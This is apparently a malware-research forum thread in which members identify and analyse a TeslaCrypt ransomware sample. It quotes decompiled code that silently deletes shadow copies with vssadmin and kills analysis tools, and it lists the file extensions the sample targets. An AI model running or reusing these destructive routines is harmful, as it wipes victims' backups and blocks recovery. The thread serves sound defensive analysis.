[Sargerras]

Hello,

and some more of this bad stuff.

[AaLl86]

Hi!
This is a dropper that claims to be the new CryptoLocker 3.0.
Even if in the available analysis (http://www.bleepingcomputer.com/forums/ ... eo-gamers/ or http://labs.bromium.com/2015/03/12/achi ... eo-gamers/), and the dropper itself, speak about an asymmetric RSA-2048 encryption, I can assure you all that the file encryption is a SYMMETRIC AES256 encryption.
You can decrypt your files using the "key.dat" inside the "APPDATA" folder....


Andrea

[Blaze]

Probable Cryptowall 3.0 sample attached, can't check thoroughly myself right now.

[Snakebyte]

Thank you

[Artilllerie]

Blaze : It's a sort of cryptolocker sample :

[Blaze]

Interesting Artillerie, did you run this on a physical or virtual machine? I had the same result as you on a virtual machine, however on a physical machine I got:



I was thinking this may be TeslaCrypt.

[Artilllerie]

Very interesting, tested on my side on Win 7 32b with VMware.

[EP_X0FF]

Here is unpacked. Have no idea what is it, since I don't follow modern cryptolockers, but code seems readable.

Some parts for example.

Code: Select all

  pExecInfo.lpVerb = L"open";
  if ( !dword_4681A8 )
    pExecInfo.lpVerb = L"runas";
  pExecInfo.lpFile = L"vssadmin.exe";
  pExecInfo.lpParameters = L"delete shadows /all /Quiet";
  pExecInfo.nShow = 0;
  pExecInfo.fMask = 64;
  while ( !ShellExecuteExW(&pExecInfo)

Code: Select all

        if ( wcsstr(&ImageFileName, L"taskmgr")
          || wcsstr(&ImageFileName, L"procexp")
          || wcsstr(&ImageFileName, L"regedit")
          || wcsstr(&ImageFileName, L"msconfig")
          || wcsstr(&ImageFileName, L"cmd.exe") )
          TerminateProcess(v4, 0);

Also by hardcoded mutex name "dslhufdks3" you can find some references in google :)

File exts.

Code: Select all

.sql
.rar
.wma
.avi
.wmv
.csv
.d3dbsp
.zip
.sie
.sum
.ibank
.qdf
.gdb
.tax
.pkpass
.bkp
.qic
.bkf
.sidn
.sidd
.mddata
.itl
.itdb
.icxs
.hvpl
.hplg
.hkdb
.mdbackup
.syncdb
.gho
.cas
.svg
.map
.wmo
.itm
.fos
.mov
.vdf
.ztmp
.sis
.sid
.ncf
.menu
.layout
.dmp
.blob
.esm
.vcf
.vtf
.dazip
.fpk
.mlx
.iwd
.vpk
.tor
.psk
.rim
.fsh
.ntl
.arch00
.lvl
.snx
.cfr
.vpp_pc
.lrf
.mcmeta
.vfs0
.mpqge
.kdb
.dba
.rofl
.hkx
.bar
.upk
.das
.iwi
.litemod
.asset
.forge
.ltx
.bsa
.apk
.sav
.lbf
.slm
.bik
.epk
.rgss3a
.pak
.big
wallet
.wotreplay
.xxx
.desc
.flv
.css
.png
.jpeg
.txt
.pfx
.pem
.crt
.cer
.der
.srw
.pef
.ptx
.rwl
.raw
.raf
.orf
.nrw
.mrwref
.mef
.erf
.kdc
.dcr
.crw
.bay
.srf
.arw
.dng
.jpe
.jpg
.cdr
.indd
.eps
.pdf
.pdd
.psd
.dbf
.mdf
.rtf
.wpd
.dxg
.dwg
.pst
.accdb
.mdb
.pptm
.pptx
.ppt
.xlk
.xlsb
.xlsm
.xlsx
.xls
.wps
.docm
.docx
.doc
.odb
.odc
.odm
.odp
.ods
.odt

[Grinler]

This is teslacrypt. Notice the version number in the GUI title and game extensions.

[Grinler]

Yup, to confirm I just installed and its TeslaCrypt. Not sure why you saw the CW 3.0 screen. That's strange.

Some minor changes in this version include new ransom note filenames:

HELP_RESTORE_FILES.txt
HELP_RESTORE_FILES.bmp

Still has open img dir:

hxxp://34r6hq26q2h4jkzj.79fhdm16.com/img/